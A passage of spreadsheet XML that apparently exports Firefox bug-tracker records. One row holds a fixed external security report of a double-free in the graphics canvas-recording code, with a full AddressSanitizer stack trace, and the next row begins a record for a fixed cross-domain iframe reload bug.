      <c r="C3012" t="inlineStr">
        <is>
          <t>AddressSanitizer: attempting double-free from gfx::RecordedFillGlyphs and UAF (0xe5e5e5e5e5e5e5e5 on crash report)</t>
        </is>
      </c>
      <c r="D3012" t="inlineStr">
        <is>
          <t>2024-05-30 10:35:13 -0700</t>
        </is>
      </c>
      <c r="E3012" t="n">
        <v>1</v>
      </c>
      <c r="F3012" t="n">
        <v>1</v>
      </c>
      <c r="G3012" t="n">
        <v>3</v>
      </c>
      <c r="H3012" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3012" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3012" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
      <c r="K3012" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3012" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3012" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3012" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3012" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3012" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][sec-survey][adv-main91+][adv-esr78.13+]</t>
        </is>
      </c>
      <c r="Q3012" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3012" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3012" t="inlineStr">
        <is>
          <t>92 Branch</t>
        </is>
      </c>
      <c r="T3012" t="n">
        <v>1</v>
      </c>
      <c r="U3012" t="n">
        <v>0</v>
      </c>
      <c r="V3012" t="n">
        <v>33</v>
      </c>
      <c r="W3012" t="inlineStr">
        <is>
          <t>After visiting the testcase then reloading the page I noticed Firefox window become blank for a few second after that Firefox ASan will show output logs `AddressSanitizer: attempting double-free on address in thread T46 from mozilla::gfx::RecordedFillGlyphs::~RecordedFillGlyphs`.
On Firefox (non-asan) some crash report contain `0xe5e5e5e5e5e5e5e5` in one of CPU registers (which I assume the UAF address). Furthermore after some crash, I observe in some crash report it show access-violation on `0x100000009`, `0x10b0481d060`, `0xffffffffffffffff` or breakpoint on some address.
I'm currently reducing the testcase, I'll attach the testcase following with STR as soon as I'm done =).
## Tested on:
- Firefox Nightly 92.0a1 (2021-07-24) (64-bit) on Windows 10
- m-c-20210723213232-asan-opt on Windows 10 
- m-c-20210715094037-asan-opt on Windows 10
- Firefox 90.0.2 (64-bit) on Windows 10
- m-c-20210406094706-asan-opt on Windows 10
## ASan output:
```
=================================================================
==13524==ERROR: AddressSanitizer: attempting double-free on 0x11f34206ab50 in thread T46:
    #0 0x7ff963c15afb in free Z:\task_1626506473\fetches\llvm-project\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cpp:82
    #1 0x7ff9500ae3ba in operator delete[] /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:60
    #2 0x7ff9500ae3ba in mozilla::gfx::RecordedFillGlyphs::~RecordedFillGlyphs /builds/worker/checkouts/gecko/gfx/2d/RecordedEventImpl.h:2366
    #3 0x7ff9500ae3ba in mozilla::gfx::RecordedEvent::DoWithEvent&lt;class mozilla::gfx::EventRingBuffer&gt;(class mozilla::gfx::EventRingBuffer &amp;, enum mozilla::gfx::RecordedEvent::EventType, class std::function&lt;(class mozilla::gfx::RecordedEvent *)&gt; const &amp;) /builds/worker/checkouts/gecko/gfx/2d/RecordedEventImpl.h:3989
    #4 0x7ff950858f5a in mozilla::layers::CanvasTranslator::TranslateRecording(void) /builds/worker/checkouts/gecko/gfx/layers/ipc/CanvasTranslator.cpp:245
    #5 0x7ff950858837 in mozilla::layers::CanvasTranslator::StartTranslation(void) /builds/worker/checkouts/gecko/gfx/layers/ipc/CanvasTranslator.cpp:168
    #6 0x7ff94d77441a in mozilla::detail::RunnableMethodArguments&lt;&gt;::applyImpl /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1148
    #7 0x7ff94d77441a in mozilla::detail::RunnableMethodArguments&lt;&gt;::apply /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1154
    #8 0x7ff94d77441a in mozilla::detail::RunnableMethodImpl&lt;class nsCOMPtr&lt;class mozilla::dom::SVGSVGElement&gt;, void (__cdecl mozilla::dom::SVGSVGElement::*)(void), 1, 0&gt;::Run(void) /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1201
    #9 0x7ff94d941d4d in mozilla::TaskQueue::Runner::Run(void) /builds/worker/checkouts/gecko/xpcom/threads/TaskQueue.cpp:208
    #10 0x7ff94d974808 in nsThreadPool::Run(void) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadPool.cpp:303
    #11 0x7ff94d95fc74 in nsThread::ProcessNextEvent(bool, bool *) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1142
    #12 0x7ff94d96ff2c in NS_ProcessNextEvent(class nsIThread *, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:466
    #13 0x7ff94ed1413e in mozilla::ipc::MessagePumpForNonMainThreads::Run(class base::MessagePump::Delegate *) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:300
    #14 0x7ff94ec21615 in MessageLoop::RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331
    #15 0x7ff94ec21615 in MessageLoop::RunHandler(void) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #16 0x7ff94ec213e5 in MessageLoop::Run(void) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #17 0x7ff94d958a00 in nsThread::ThreadFunc(void *) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:390
    #18 0x7ff974151fbe in _PR_NativeRunThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:399
    #19 0x7ff97412b08b in pr_root /builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c:139
    #20 0x7ff9d1691bb1  (C:\Windows\System32\ucrtbase.dll+0x180021bb1)
    #21 0x7ff963c20617 in __asan::AsanThread::ThreadStart(unsigned __int64) Z:\task_1626506473\fetches\llvm-project\llvm\projects\compiler-rt\lib\asan\asan_thread.cpp:270
    #22 0x7ff9d28b7033  (C:\Windows\System32\KERNEL32.DLL+0x180017033)
    #23 0x7ff9751345ec in mozilla::interceptor::FuncHook&lt;mozilla::interceptor::WindowsDllInterceptor&lt;mozilla::interceptor::VMSharingPolicyShared&gt;,void (*)(int, void *, void *)&gt;::operator() /builds/worker/workspace/obj-build/dist/include/nsWindowsDllInterceptor.h:150
    #24 0x7ff9751345ec in patched_BaseThreadInitThunk /builds/worker/checkouts/gecko/mozglue/dllservices/WindowsDllBlocklist.cpp:588
    #25 0x7ff9d3982650  (C:\Windows\SYSTEM32\ntdll.dll+0x180052650)
0x11f34206ab50 is located 0 bytes inside of 12-byte region [0x11f34206ab50,0x11f34206ab5c)
freed by thread T46 here:
    #0 0x7ff963c15afb in free Z:\task_1626506473\fetches\llvm-project\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cpp:82
    #1 0x7ff9500ae3ba in operator delete[] /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:60
    #2 0x7ff9500ae3ba in mozilla::gfx::RecordedFillGlyphs::~RecordedFillGlyphs /builds/worker/checkouts/gecko/gfx/2d/RecordedEventImpl.h:2366
    #3 0x7ff9500ae3ba in mozilla::gfx::RecordedEvent::DoWithEvent&lt;class mozilla::gfx::EventRingBuffer&gt;(class mozilla::gfx::EventRingBuffer &amp;, enum mozilla::gfx::RecordedEvent::EventType, class std::function&lt;(class mozilla::gfx::RecordedEvent *)&gt; const &amp;) /builds/worker/checkouts/gecko/gfx/2d/RecordedEventImpl.h:3989
    #4 0x7ff950858f5a in mozilla::layers::CanvasTranslator::TranslateRecording(void) /builds/worker/checkouts/gecko/gfx/layers/ipc/CanvasTranslator.cpp:245
    #5 0x7ff950858837 in mozilla::layers::CanvasTranslator::StartTranslation(void) /builds/worker/checkouts/gecko/gfx/layers/ipc/CanvasTranslator.cpp:168
    #6 0x7ff94d77441a in mozilla::detail::RunnableMethodArguments&lt;&gt;::applyImpl /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1148
    #7 0x7ff94d77441a in mozilla::detail::RunnableMethodArguments&lt;&gt;::apply /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1154
    #8 0x7ff94d77441a in mozilla::detail::RunnableMethodImpl&lt;class nsCOMPtr&lt;class mozilla::dom::SVGSVGElement&gt;, void (__cdecl mozilla::dom::SVGSVGElement::*)(void), 1, 0&gt;::Run(void) /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1201
    #9 0x7ff94d941d4d in mozilla::TaskQueue::Runner::Run(void) /builds/worker/checkouts/gecko/xpcom/threads/TaskQueue.cpp:208
    #10 0x7ff94d974808 in nsThreadPool::Run(void) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadPool.cpp:303
    #11 0x7ff94d95fc74 in nsThread::ProcessNextEvent(bool, bool *) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1142
    #12 0x7ff94d96ff2c in NS_ProcessNextEvent(class nsIThread *, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:466
    #13 0x7ff94ed1413e in mozilla::ipc::MessagePumpForNonMainThreads::Run(class base::MessagePump::Delegate *) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:300
    #14 0x7ff94ec21615 in MessageLoop::RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331
    #15 0x7ff94ec21615 in MessageLoop::RunHandler(void) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #16 0x7ff94ec213e5 in MessageLoop::Run(void) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #17 0x7ff94d958a00 in nsThread::ThreadFunc(void *) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:390
    #18 0x7ff974151fbe in _PR_NativeRunThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:399
    #19 0x7ff97412b08b in pr_root /builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c:139
    #20 0x7ff9d1691bb1  (C:\Windows\System32\ucrtbase.dll+0x180021bb1)
    #21 0x7ff963c20617 in __asan::AsanThread::ThreadStart(unsigned __int64) Z:\task_1626506473\fetches\llvm-project\llvm\projects\compiler-rt\lib\asan\asan_thread.cpp:270
    #22 0x7ff9d28b7033  (C:\Windows\System32\KERNEL32.DLL+0x180017033)
    #23 0x7ff9751345ec in mozilla::interceptor::FuncHook&lt;mozilla::interceptor::WindowsDllInterceptor&lt;mozilla::interceptor::VMSharingPolicyShared&gt;,void (*)(int, void *, void *)&gt;::operator() /builds/worker/workspace/obj-build/dist/include/nsWindowsDllInterceptor.h:150
    #24 0x7ff9751345ec in patched_BaseThreadInitThunk /builds/worker/checkouts/gecko/mozglue/dllservices/WindowsDllBlocklist.cpp:588
previously allocated by thread T46 here:
    #0 0x7ff963c15c0b in malloc Z:\task_1626506473\fetches\llvm-project\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cpp:98
    #1 0x7ff97513139d in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52
    #2 0x7ff9500eb502 in operator new[] /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:42
    #3 0x7ff9500eb502 in mozilla::gfx::RecordedFillGlyphs::RecordedFillGlyphs&lt;class mozilla::gfx::EventStream&gt;(class mozilla::gfx::EventStream &amp;) /builds/worker/checkouts/gecko/gfx/2d/RecordedEventImpl.h:2398
    #4 0x7ff9500ae2e2 in mozilla::gfx::RecordedEvent::DoWithEvent&lt;class mozilla::gfx::EventRingBuffer&gt;(class mozilla::gfx::EventRingBuffer &amp;, enum mozilla::gfx::RecordedEvent::EventType, class std::function&lt;(class mozilla::gfx::RecordedEvent *)&gt; const &amp;) /builds/worker/checkouts/gecko/gfx/2d/RecordedEventImpl.h:3989
    #5 0x7ff950858f5a in mozilla::layers::CanvasTranslator::TranslateRecording(void) /builds/worker/checkouts/gecko/gfx/layers/ipc/CanvasTranslator.cpp:245
    #6 0x7ff950858837 in mozilla::layers::CanvasTranslator::StartTranslation(void) /builds/worker/checkouts/gecko/gfx/layers/ipc/CanvasTranslator.cpp:168
    #7 0x7ff94d77441a in mozilla::detail::RunnableMethodArguments&lt;&gt;::applyImpl /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1148
    #8 0x7ff94d77441a in mozilla::detail::RunnableMethodArguments&lt;&gt;::apply /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1154
    #9 0x7ff94d77441a in mozilla::detail::RunnableMethodImpl&lt;class nsCOMPtr&lt;class mozilla::dom::SVGSVGElement&gt;, void (__cdecl mozilla::dom::SVGSVGElement::*)(void), 1, 0&gt;::Run(void) /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1201
    #10 0x7ff94d941d4d in mozilla::TaskQueue::Runner::Run(void) /builds/worker/checkouts/gecko/xpcom/threads/TaskQueue.cpp:208
    #11 0x7ff94d974808 in nsThreadPool::Run(void) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadPool.cpp:303
    #12 0x7ff94d95fc74 in nsThread::ProcessNextEvent(bool, bool *) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1142
    #13 0x7ff94d96ff2c in NS_ProcessNextEvent(class nsIThread *, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:466
    #14 0x7ff94ed1413e in mozilla::ipc::MessagePumpForNonMainThreads::Run(class base::MessagePump::Delegate *) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:300
    #15 0x7ff94ec21615 in MessageLoop::RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331
    #16 0x7ff94ec21615 in MessageLoop::RunHandler(void) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #17 0x7ff94ec213e5 in MessageLoop::Run(void) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #18 0x7ff94d958a00 in nsThread::ThreadFunc(void *) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:390
    #19 0x7ff974151fbe in _PR_NativeRunThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:399
    #20 0x7ff97412b08b in pr_root /builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c:139
    #21 0x7ff9d1691bb1  (C:\Windows\System32\ucrtbase.dll+0x180021bb1)
    #22 0x7ff963c20617 in __asan::AsanThread::ThreadStart(unsigned __int64) Z:\task_1626506473\fetches\llvm-project\llvm\projects\compiler-rt\lib\asan\asan_thread.cpp:270
Thread T46 created by T4 here:
    #0 0x7ff963c216b2 in __asan_wrap_CreateThread Z:\task_1626506473\fetches\llvm-project\llvm\projects\compiler-rt\lib\asan\asan_win.cpp:146
    #1 0x7ff9d1691896  (C:\Windows\System32\ucrtbase.dll+0x180021896)
    #2 0x7ff97412aebd in _PR_MD_CREATE_THREAD /builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c:153
    #3 0x7ff974152d9c in _PR_NativeCreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1058
    #4 0x7ff9741536f3 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1184
    #5 0x7ff974149abf in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1404
    #6 0x7ff94d95b20c in nsThread::Init(class nsTSubstring&lt;char&gt; const &amp;) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:602
    #7 0x7ff94d96d53b in nsThreadManager::NewNamedThread(class nsTSubstring&lt;char&gt; const &amp;, unsigned int, class nsIThread **) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadManager.cpp:573
    #8 0x7ff94d97947c in NS_NewNamedThread(class nsTSubstring&lt;char&gt; const &amp;, class nsIThread **, struct already_AddRefed&lt;class nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:162
    #9 0x7ff94d972be6 in NS_NewNamedThread /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:155
    #10 0x7ff94d972be6 in nsThreadPool::PutEvent(struct already_AddRefed&lt;class nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadPool.cpp:118
    #11 0x7ff94d975eeb in nsThreadPool::Dispatch(struct already_AddRefed&lt;class nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadPool.cpp:354
    #12 0x7ff94d92b86a in mozilla::SharedThreadPool::Dispatch(struct already_AddRefed&lt;class nsIRunnable&gt;, unsigned int) /builds/worker/workspace/obj-build/dist/include/mozilla/SharedThreadPool.h:73
    #13 0x7ff94d93f09a in mozilla::TaskQueue::DispatchLocked(class nsCOMPtr&lt;class nsIRunnable&gt; &amp;, unsigned int, enum mozilla::AbstractThread::DispatchReason) /builds/worker/checkouts/gecko/xpcom/threads/TaskQueue.cpp:68
    #14 0x7ff94d97d22b in mozilla::TaskQueue::Dispatch(struct already_AddRefed&lt;class nsIRunnable&gt;, enum mozilla::AbstractThread::DispatchReason) /builds/worker/workspace/obj-build/dist/include/mozilla/TaskQueue.h:88
    #15 0x7ff9508585da in mozilla::layers::CanvasTranslator::RecvResumeTranslation(void) /builds/worker/checkouts/gecko/gfx/layers/ipc/CanvasTranslator.cpp:160
    #16 0x7ff9508570cd in mozilla::layers::CanvasTranslator::RecvInitTranslator(enum mozilla::layers::TextureType const &amp;, void *const &amp;, void *const &amp;, void *const &amp;) /builds/worker/checkouts/gecko/gfx/layers/ipc/CanvasTranslator.cpp:151
    #17 0x7ff94f7f20fe in mozilla::layers::PCanvasParent::OnMessageReceived(class IPC::Message const &amp;) /builds/worker/workspace/obj-build/ipc/ipdl/PCanvasParent.cpp:188
    #18 0x7ff94ed09904 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(class mozilla::ipc::ActorLifecycleProxy *, class IPC::Message const &amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:2084
    #19 0x7ff94ed05d6f in mozilla::ipc::MessageChannel::DispatchMessage(class IPC::Message &amp;&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:2011
    #20 0x7ff94ed07bf1 in mozilla::ipc::MessageChannel::RunMessage(class mozilla::ipc::MessageChannel::MessageTask &amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1859
    #21 0x7ff94ed0819c in mozilla::ipc::MessageChannel::MessageTask::Run(void) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1890
    #22 0x7ff94d941d4d in mozilla::TaskQueue::Runner::Run(void) /builds/worker/checkouts/gecko/xpcom/threads/TaskQueue.cpp:208
    #23 0x7ff94d974808 in nsThreadPool::Run(void) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadPool.cpp:303
    #24 0x7ff94d95fc74 in nsThread::ProcessNextEvent(bool, bool *) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1142
    #25 0x7ff94d96ff2c in NS_ProcessNextEvent(class nsIThread *, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:466
    #26 0x7ff94ed1413e in mozilla::ipc::MessagePumpForNonMainThreads::Run(class base::MessagePump::Delegate *) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:300
    #27 0x7ff94ec21615 in MessageLoop::RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331
    #28 0x7ff94ec21615 in MessageLoop::RunHandler(void) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #29 0x7ff94ec213e5 in MessageLoop::Run(void) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #30 0x7ff94d958a00 in nsThread::ThreadFunc(void *) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:390
    #31 0x7ff974151fbe in _PR_NativeRunThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:399
    #32 0x7ff97412b08b in pr_root /builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c:139
    #33 0x7ff9d1691bb1  (C:\Windows\System32\ucrtbase.dll+0x180021bb1)
    #34 0x7ff963c20617 in __asan::AsanThread::ThreadStart(unsigned __int64) Z:\task_1626506473\fetches\llvm-project\llvm\projects\compiler-rt\lib\asan\asan_thread.cpp:270
    #35 0x7ff9d28b7033  (C:\Windows\System32\KERNEL32.DLL+0x180017033)
    #36 0x7ff9751345ec in mozilla::interceptor::FuncHook&lt;mozilla::interceptor::WindowsDllInterceptor&lt;mozilla::interceptor::VMSharingPolicyShared&gt;,void (*)(int, void *, void *)&gt;::operator() /builds/worker/workspace/obj-build/dist/include/nsWindowsDllInterceptor.h:150
    #37 0x7ff9751345ec in patched_BaseThreadInitThunk /builds/worker/checkouts/gecko/mozglue/dllservices/WindowsDllBlocklist.cpp:588
    #38 0x7ff9d3982650  (C:\Windows\SYSTEM32\ntdll.dll+0x180052650)
Thread T4 created by T0 here:
    #0 0x7ff963c216b2 in __asan_wrap_CreateThread Z:\task_1626506473\fetches\llvm-project\llvm\projects\compiler-rt\lib\asan\asan_win.cpp:146
    #1 0x7ff9d1691896  (C:\Windows\System32\ucrtbase.dll+0x180021896)
    #2 0x7ff97412aebd in _PR_MD_CREATE_THREAD /builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c:153
    #3 0x7ff974152d9c in _PR_NativeCreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1058
    #4 0x7ff9741536f3 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1184
    #5 0x7ff974149abf in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1404
    #6 0x7ff94d95b20c in nsThread::Init(class nsTSubstring&lt;char&gt; const &amp;) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:602
    #7 0x7ff94d96d53b in nsThreadManager::NewNamedThread(class nsTSubstring&lt;char&gt; const &amp;, unsigned int, class nsIThread **) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadManager.cpp:573
    #8 0x7ff94d97947c in NS_NewNamedThread(class nsTSubstring&lt;char&gt; const &amp;, class nsIThread **, struct already_AddRefed&lt;class nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:162
    #9 0x7ff94d972be6 in NS_NewNamedThread /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:155
    #10 0x7ff94d972be6 in nsThreadPool::PutEvent(struct already_AddRefed&lt;class nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadPool.cpp:118
    #11 0x7ff94d975eeb in nsThreadPool::Dispatch(struct already_AddRefed&lt;class nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadPool.cpp:354
    #12 0x7ff94d96673d in BackgroundEventTarget::Dispatch(struct already_AddRefed&lt;class nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadManager.cpp:166
    #13 0x7ff94d97b825 in nsIEventTarget::Dispatch /builds/worker/workspace/obj-build/dist/include/nsIEventTarget.h:41
    #14 0x7ff94d97b825 in nsThreadManager::DispatchToBackgroundThread /builds/worker/checkouts/gecko/xpcom/threads/nsThreadManager.cpp:501
    #15 0x7ff94d97b825 in NS_DispatchBackgroundTask(struct already_AddRefed&lt;class nsIRunnable&gt;, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:502
    #16 0x7ff956f9f679 in mozilla::crashreporter::LSPAnnotate(void) /builds/worker/checkouts/gecko/widget/windows/LSPAnnotator.cpp:131
    #17 0x7ff956fdd990 in nsAppShell::Init(void) /builds/worker/checkouts/gecko/widget/windows/nsAppShell.cpp:501
    #18 0x7ff956f1dd4f in nsAppShellInit /builds/worker/checkouts/gecko/widget/nsAppShellSingleton.h:47
    #19 0x7ff956f1dd4f in nsWidgetWindowsModuleCtor(void) /builds/worker/checkouts/gecko/widget/windows/nsWidgetFactory.cpp:49
    #20 0x7ff94d8b7d51 in mozilla::xpcom::CallInitFunc /builds/worker/workspace/obj-build/xpcom/components/StaticComponents.cpp:8961
    #21 0x7ff94d8b7d51 in mozilla::xpcom::CreateInstanceImpl /builds/worker/workspace/obj-build/xpcom/components/StaticComponents.cpp:11279
    #22 0x7ff94d905ad3 in `anonymous namespace'::EntryWrapper::CreateInstance /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:174
    #23 0x7ff94d905ad3 in nsComponentManagerImpl::GetServiceLocked /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:1276
    #24 0x7ff94d904c58 in nsComponentManagerImpl::GetService(struct nsID const &amp;, struct nsID const &amp;, void **) /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:1330
    #25 0x7ff94d90f74e in CallGetService /builds/worker/checkouts/gecko/xpcom/components/nsComponentManagerUtils.cpp:51
    #26 0x7ff94d90f74e in nsGetServiceByCID::operator()(struct nsID const &amp;, void **) const /builds/worker/checkouts/gecko/xpcom/components/nsComponentManagerUtils.cpp:220
    #27 0x7ff94d706743 in nsCOMPtr_base::assign_from_gs_cid(class nsGetServiceByCID, struct nsID const &amp;) /builds/worker/checkouts/gecko/xpcom/base/nsCOMPtr.cpp:64
    #28 0x7ff95b3d3219 in nsCOMPtr&lt;nsIAppShell&gt;::nsCOMPtr /builds/worker/workspace/obj-build/dist/include/nsCOMPtr.h:611
    #29 0x7ff95b3d3219 in XRE_RunAppShell(void) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:867
    #30 0x7ff94ec21615 in MessageLoop::RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331
    #31 0x7ff94ec21615 in MessageLoop::RunHandler(void) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #32 0x7ff94ec213e5 in MessageLoop::Run(void) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #33 0x7ff95b3d2709 in XRE_InitChildProcess(int, char **const, struct XREChildData const *) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:742
    #34 0x7ff6b0631f49 in content_process_main /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:58
    #35 0x7ff6b0631f49 in NS_internal_main(int, char **, char **) /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327
    #36 0x7ff6b06314d4 in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:131
    #37 0x7ff6b072f207 in invoke_main f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:90
    #38 0x7ff6b072f207 in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #39 0x7ff9d28b7033  (C:\Windows\System32\KERNEL32.DLL+0x180017033)
    #40 0x7ff9d3982650  (C:\Windows\SYSTEM32\ntdll.dll+0x180052650)
SUMMARY: AddressSanitizer: double-free Z:\task_1626506473\fetches\llvm-project\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cpp:82 in free
==13524==ABORTING
```</t>
        </is>
      </c>
      <c r="X3012" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3013">
      <c r="A3013" t="n">
        <v>1322896</v>
      </c>
      <c r="B3013" t="inlineStr">
        <is>
          <t>2016-12-11 03:36:25 -0800</t>
        </is>
      </c>
      <c r="C3013" t="inlineStr">
        <is>
          <t>(cross domain) Iframe breakes scope on location.reload</t>
        </is>
      </c>
      <c r="D3013" t="inlineStr">
        <is>
          <t>2024-05-30 09:24:12 -0700</t>
        </is>
      </c>
      <c r="E3013" t="n">
        <v>1</v>
      </c>
      <c r="F3013" t="n">
        <v>1</v>
      </c>
      <c r="G3013" t="n">
        <v>3</v>
      </c>
      <c r="H3013" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3013" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3013" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K3013" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L3013" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3013" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3013" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3013" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3013" t="inlineStr">
        <is>
          <t>[adv-main55+][adv-esr52.3+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3013" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3013" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3013" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T3013" t="n">
        <v>1</v>
      </c>
